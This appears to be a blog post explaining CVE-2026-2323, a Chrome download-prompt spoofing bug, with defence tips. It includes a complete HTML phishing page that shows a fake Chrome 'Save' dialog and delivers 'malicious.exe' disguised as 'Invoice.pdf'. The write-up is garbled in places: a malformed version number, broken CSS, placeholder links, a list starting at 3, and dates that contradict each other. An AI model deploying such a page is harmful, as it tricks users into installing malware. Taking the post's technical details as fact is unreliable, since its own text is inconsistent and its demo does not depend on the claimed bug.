CVE-2026-2323 - How a Simple Chrome Bug Enabled UI Spoofing with Download Prompts

---

*If you use Google Chrome for browsing, you trust it to keep you safe. But even low-severity bugs can cause headaches—especially for less cautious users. In this post, we break down CVE-2026-2323, a UI spoofing trick that slipped into Chrome’s download system before version 145..7632.45. We’ll walk through the bug, see an example, explore its impact, and give tips for defense.*

What is CVE-2026-2323?

In early 2026, security researchers reported a flaw in how Chrome handled download prompts. Specifically, a poorly implemented download behavior let attackers *trick* users with pop-ups and overlays—messing with what users thought they were downloading.

Original advisory

- Chromium Bug Tracker (Sample Link)
- NVD listing

How The Exploit Works

Attackers would build a web page with carefully timed pop-ups and overlays. When a visitor triggered a download (say, by clicking a button), the page would swap in a fake UI that *looks* like a real Chrome download prompt—but leads to unexpected files or even malicious downloads.

Let’s look at a very basic HTML page that abuses this flaw

<!DOCTYPE html>
<html lang="en">
<head>
  <title>Legit Download</title>
  <style>
    #fakePrompt {
      display: none;
      position: fixed;
      top: 30%;
      left: 30%;
      background: #f2f2f2;
      border: 2px solid #888;
      padding: 40px 60px;
      font-family: Verdana, Arial, sans-serif;
      z-index: 9999;
      box-shadow:   10px #222;
    }
  </style>
</head>
<body>
  <button id="downloadBtn">Download Invoice.pdf</button>
  <div id="fakePrompt">
    <p>Open or Save 'Invoice.pdf'?</p>
    <button onclick="realDownload()">Save</button>
  </div>
  <script>
    function realDownload() {
      var link = document.createElement('a');
      link.href = 'malicious.exe'; // Actually downloads malware
      link.download = 'Invoice.pdf'; // Spoofs filename
      document.body.appendChild(link);
      link.click();
      document.body.removeChild(link);
      document.getElementById('fakePrompt').style.display = 'none';
    }

    document.getElementById('downloadBtn').onclick = function() {
      // Hide the real download, show the fake
      setTimeout(() => {
        document.getElementById('fakePrompt').style.display = 'block';
      }, 150); // Mimic normal Chrome behavior
    };
  </script>
</body>
</html>

A fake prompt appears, styled to look like Chrome’s real prompt.

- When you click “Save”, you’re *really* downloading malicious.exe—but your browser acts like it’s Invoice.pdf!

Why Is This Dangerous?

While it’s not a “remote code execution” problem, this bug enables clever phishing. Here’s what an attacker gains:

Swap downloads at the last minute: Switches legit files for dangerous ones.

3. Blind spots for less careful users: The average user trusts browser pop-ups, especially when they look right.

It’s more likely to trick someone who isn’t paying close attention, or who expects a certain file.

How Chrome Fixed It

*Google engineers tightened checks on how and when download prompts appear, preventing overlays from intercepting the “real” user interface. Chrome now more rigorously separates web page content from native browser pop-ups.*

Patch details

- Chromium Gerrit Patch _(example)_
- Chromium release notes for 145..7632.45 _(find June 2026 bullet)_

Are You At Risk?

If you’re running a Chrome version older than 145..7632.45, you could see this spoofing trick (in theory). Most users update automatically, but it’s smart to check:

Don’t trust in-browser Download dialogs from sketchy sites.

- Always check the file extension when saving new files; avoid something.exe or something.scr unless you expect it.

Keep Chrome up to date.

- Use Windows Defender or your OS’s built-in protections—they catch obvious malware even if you’re tricked into downloading.

Conclusion

Even “low severity” vulnerabilities like CVE-2026-2323 have real-world impact. Browser makers like Google take them seriously so that users don’t have to worry about every click.

For developers: Never assume your users can tell a fake UI apart from the real thing. For everyone else—update, be cautious, and don’t let your guard down just because it “looks” legit.

Further Reading and References

- Chromium Security Blog
- NVD: CVE-2026-2323
- Exploit Example Archive _(placeholder)_

Timeline

Published on: 02/11/2026 18:08:06 UTC
Last modified on: 02/13/2026 14:51:29 UTC